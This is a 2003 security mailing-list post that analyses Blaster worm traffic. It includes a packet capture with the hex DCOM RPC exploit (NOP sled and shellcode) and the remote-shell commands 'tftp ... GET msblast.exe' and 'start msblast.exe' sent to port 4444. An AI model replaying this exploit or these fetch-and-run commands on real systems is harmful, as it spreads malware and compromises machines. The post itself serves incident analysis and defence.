[Dshield] UDP 137 Scans

John Sage jsage at finchhaven.com
Tue Aug 12 20:21:41 GMT 2003


Jon, et al:

On Tue, Aug 12, 2003 at 03:21:34PM -0400, Jon R. Kibler wrote:
> Greetings:
> 
> We are getting whacked pretty good by 137/UDP scans -- a different
block of 3 to 7 IPs in rapid succession every few minutes. Presently,
these scans are outnumbering 135/TCP scans by a factor of 2 or 3 to
1.
> 
> These are being blocked on our DSL router and I have no easy way of
doing a packet capture or submitting logs.
> 
> This all started about noon EDT.
> 
> Any idea what is going on here?

I am starting to see UDP:137 probes within the TCP:135/TCP:4444
probes; i.e. from the same host, at the same time.

Viz:

input: snort.log.1060670467
filter: ip and ( src host 12.82.144.224 )
#
T 2003/08/12 00:18:34.363541 12.82.144.224:2814 -> 12.82.133.139:135 [S]
#
T 2003/08/12 00:18:34.633590 12.82.144.224:2814 -> 12.82.133.139:135 [A]
#
T 2003/08/12 00:18:36.103736 12.82.144.224:2814 -> 12.82.133.139:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/12 00:18:36.673951 12.82.144.224:2814 -> 12.82.133.139:135 [A]
  05 00 00 03 10 00 00 00    a8 06 00 00 e5 00 00 00    ................
  90 06 00 00 01 00 04 00    05 00 06 00 01 00 00 00    ................
  00 00 00 00 32 24 58 fd    cc 45 64 49 b0 70 dd ae    ....2$X..EdI.p..
  74 2c 96 d2 60 5e 0d 00    01 00 00 00 00 00 00 00    t,..`^..........
  70 5e 0d 00 02 00 00 00    7c 5e 0d 00 00 00 00 00    p^......|^......
  10 00 00 00 80 96 f1 f1    2a 4d ce 11 a6 6a 00 20    ........*M...j. 
  af 6e 72 f4 0c 00 00 00    4d 41 52 42 01 00 00 00    .nr.....MARB....
  00 00 00 00 0d f0 ad ba    00 00 00 00 a8 f4 0b 00    ................
  20 06 00 00 20 06 00 00    4d 45 4f 57 04 00 00 00     ... ...MEOW....
  a2 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  38 03 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    8..............F
  00 00 00 00 f0 05 00 00    e8 05 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    c8 00 00 00 4d 45 4f 57    ............MEOW
  e8 05 00 00 d8 00 00 00    00 00 00 00 02 00 00 00    ................
  07 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 c4 28 cd 00    64 29 cd 00 00 00 00 00    .....(..d)......
  07 00 00 00 b9 01 00 00    00 00 00 00 c0 00 00 00    ................
  00 00 00 46 ab 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a5 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a6 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a4 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 ad 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 aa 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 07 00 00 00    60 00 00 00 58 00 00 00    ...F....`...X...
  90 00 00 00 40 00 00 00    20 00 00 00 38 03 00 00    .... at ... ...8...
  30 00 00 00 01 00 00 00    01 10 08 00 cc cc cc cc    0...............
  50 00 00 00 4f b6 88 20    ff ff ff ff 00 00 00 00    P...O.. ........
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    01 10 08 00 cc cc cc cc    ................
  48 00 00 00 07 00 66 00    06 09 02 00 00 00 00 00    H.....f.........
  c0 00 00 00 00 00 00 46    10 00 00 00 00 00 00 00    .......F........
  00 00 00 00 01 00 00 00    00 00 00 00 78 19 0c 00    ............x...
  58 00 00 00 05 00 06 00    01 00 00 00 70 d8 98 93    X...........p...
  98 4f d2 11 a9 3d be 57    b2 00 00 00 32 00 31 00    .O...=.W....2.1.
  01 10 08 00 cc cc cc cc    80 00 00 00 0d f0 ad ba    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  18 43 14 00 00 00 00 00    60 00 00 00 60 00 00 00    .C......`...`...
  4d 45 4f 57 04 00 00 00    c0 01 00 00 00 00 00 00    MEOW............
  c0 00 00 00 00 00 00 46    3b 03 00 00 00 00 00 00    .......F;.......
  c0 00 00 00 00 00 00 46    00 00 00 00 30 00 00 00    .......F....0...
  01 00 01 00 81 c5 17 03    80 0e e9 4a 99 99 f1 8a    ...........J....
  50 6f 7a 85 02 00 00 00    00 00 00 00 00 00 00 00    Poz.............
  00 00 00 00 00 00 00 00    00 00 00 00 01 00 00 00    ................
  01 10 08 00 cc cc cc cc    30 00 00 00 78 00 6e 00    ........0...x.n.
  00 00 00 00 d8 da 0d 00    00 00 00 00 00 00 00 00    ................
  20 2f 0c 00 00 00 00 00    00 00 00 00 03 00 00 00     /..............
  00 00 00 00 03 00 00 00    46 00 58 00 00 00 00 00    ........F.X.....
  01 10 08 00 cc cc cc cc    10 00 00 00 30 00 2e 00    ............0...
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    68 00 00 00 0e 00 ff ff    ........h.......
  68 8b 0b 00 02 00 00 00    00 00 00 00 00 00 00 00    h...............
  86 01 00 00 00 00 00 00    86 01 00 00 5c 00 5c 00    ............\.\.
  46 00 58 00 4e 00 42 00    46 00 58 00 46 00 58 00    F.X.N.B.F.X.F.X.
  4e 00 42 00 46 00 58 00    46 00 58 00 46 00 58 00    N.B.F.X.F.X.F.X.
  46 00 58 00 9f 75 18 00    cc e0 fd 7f cc e0 fd 7f    F.X..u..........
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 eb    19 5e 31 c9 81 e9 89 ff    .........^1.....
  ff ff 81 36 80 bf 32 94    81 ee fc ff ff ff e2 f2    ...6..2.........
  eb 05 e8 e2 ff ff ff 03    53 06 1f 74 57 75 95 80    ........S..tWu..
  bf bb 92 7f 89 5a 1a ce    b1 de 7c e1 be 32 94 09    .....Z....|..2..
  f9 3a 6b b6 d7 9f 4d 85    71 da c6 81 bf 32 1d c6    .:k...M.q....2..
  b3 5a f8 ec bf 32 fc b3    8d 1c f0 e8 c8 41 a6 df    .Z...2.......A..
  eb cd c2 88 36 74 90 7f    89 5a e6 7e 0c 24 7c ad    ....6t...Z.~.$|.
  be 32 94 09 f9 22 6b b6    d7 4c 4c 62 cc da 8a 81    .2..."k..LLb....
  bf 32 1d c6 ab cd e2 84    d7 f9 79 7c 84 da 9a 81    .2........y|....
  bf 32 1d c6 a7 cd e2 84    d7 eb 9d 75 12 da 6a 80    .2.........u..j.
  bf 32 1d c6 a3 cd e2 84    d7 96 8e f0 78 da 7a 80    .2..........x.z.
  bf 32 1d c6 9f cd e2 84    d7 96 39 ae 56 da 4a 80    .2........9.V.J.
  bf 32 1d c6 9b cd e2 84    d7 d7 dd 06 f6 da 5a 80    .2............Z.
  bf 32 1d c6 97 cd e2 84    d7 d5 ed 46 c6 da 2a 80    .2.........F..*.
  bf 32 1d c6 93 01 6b 01    53 a2 95 80 bf 66 fc 81    .2....k.S....f..
  be 32 94 7f e9 2a c4 d0    ef 62 d4 d0 ff 62 6b d6    .2...*...b...bk.
  a3 b9 4c d7 e8 5a 96 80    ae 6e 1f 4c d5 24 c5 d3    ..L..Z...n.L.$..
  40 64 b4 d7 ec cd c2 a4    e8 63 c7 7f e9 1a 1f 50    @d.......c.....P
  d7 57 ec e5 bf 5a f7 ed    db 1c 1d e6 8f b1 78 d4    .W...Z........x.
  32 0e b0 b3 7f 01 5d 03    7e 27 3f 62 42 f4 d0 a4    2.....].~'?bB...
  af 76 6a c4 9b 0f 1d d4    9b 7a 1d d4 9b 7e 1d d4    .vj......z...~..
  9b 62 19 c4 9b 22 c0 d0    ee 63 c5 ea be 63 c5 7f    .b..."...c...c..
  c9 02 c5 7f e9 22 1f 4c    d5 cd 6b b1 40 64 98 0b    .....".L..k. at d..
  77 65 6b d6                                           wek.            
#
T 2003/08/12 00:18:36.753808 12.82.144.224:2814 -> 12.82.133.139:135 [AP]
  93 cd c2 94 ea 64 f0 21    8f 32 94 80 3a f2 ec 8c    .....d.!.2..:...
  34 72 98 0b cf 2e 39 0b    d7 3a 7f 89 34 72 a0 0b    4r....9..:..4r..
  17 8a 94 80 bf b9 51 de    e2 f0 90 80 ec 67 c2 d7    ......Q......g..
  34 5e b0 98 34 77 a8 0b    eb 37 ec 83 6a b9 de 98    4^..4w...7..j...
  34 68 b4 83 62 d1 a6 c9    34 06 1f 83 4a 01 6b 7c    4h..b...4...J.k|
  8c f2 38 ba 7b 46 93 41    70 3f 97 78 54 c0 af fc    ..8.{F.Ap?.xT...
  9b 26 e1 61 34 68 b0 83    62 54 1f 8c f4 b9 ce 9c    .&.a4h..bT......
  bc ef 1f 84 34 31 51 6b    bd 01 54 0b 6a 6d ca dd    ....41Qk..T.jm..
  e4 f0 90 80 2f a2 04 00    5c 00 43 00 24 00 5c 00    ..../...\.C.$.\.
  31 00 32 00 33 00 34 00    35 00 36 00 31 00 31 00    1.2.3.4.5.6.1.1.
  31 00 31 00 31 00 31 00    31 00 31 00 31 00 31 00    1.1.1.1.1.1.1.1.
  31 00 31 00 31 00 31 00    31 00 2e 00 64 00 6f 00    1.1.1.1.1...d.o.
  63 00 00 00 01 10 08 00    cc cc cc cc 20 00 00 00    c........... ...
  30 00 2d 00 00 00 00 00    88 2a 0c 00 02 00 00 00    0.-......*......
  01 00 00 00 28 8c 0c 00    01 00 00 00 07 00 00 00    ....(...........
  00 00 00 00                                           ....            
#
T 2003/08/12 00:18:36.763800 12.82.144.224:2814 -> 12.82.133.139:135 [AF]
#
T 2003/08/12 00:18:36.763880 12.82.144.224:2814 -> 12.82.133.139:135 [A]
#
T 2003/08/12 00:18:36.773806 12.82.144.224:2820 -> 12.82.133.139:4444 [S]
#
T 2003/08/12 00:18:37.033846 12.82.144.224:2820 -> 12.82.133.139:4444 [A]
#
T 2003/08/12 00:18:37.613885 12.82.144.224:2820 -> 12.82.133.139:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 34    tftp -i 12.82.14
  34 2e 32 32 34 20 47 45    54 20 6d 73 62 6c 61 73    4.224 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/12 00:18:38.173954 12.82.144.224:2820 -> 12.82.133.139:4444 [A]
#
U 2003/08/12 00:18:41.854306 12.82.144.224:137 -> 12.82.133.139:137
  80 de 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:43.374460 12.82.144.224:137 -> 12.82.133.139:137
  80 df 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:44.844605 12.82.144.224:137 -> 12.82.133.139:137
  80 e0 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:50.845219 12.82.144.224:137 -> 12.82.133.139:137
  80 e4 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:52.335378 12.82.144.224:137 -> 12.82.133.139:137
  80 e5 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
U 2003/08/12 00:18:53.825533 12.82.144.224:137 -> 12.82.133.139:137
  80 e6 00 00 00 01 00 00    00 00 00 00 20 43 4b 41    ............ CKA
  41 41 41 41 41 41 41 41    41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
  41 41 41 41 41 41 41 41    41 41 41 41 41 00 00 21    AAAAAAAAAAAAA..!
  00 01                                                 ..              
#
T 2003/08/12 00:18:58.115980 12.82.144.224:2820 -> 12.82.133.139:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit



- John
-- 
"Obviously, we do not want to leave zombies around."




More information about the list mailing list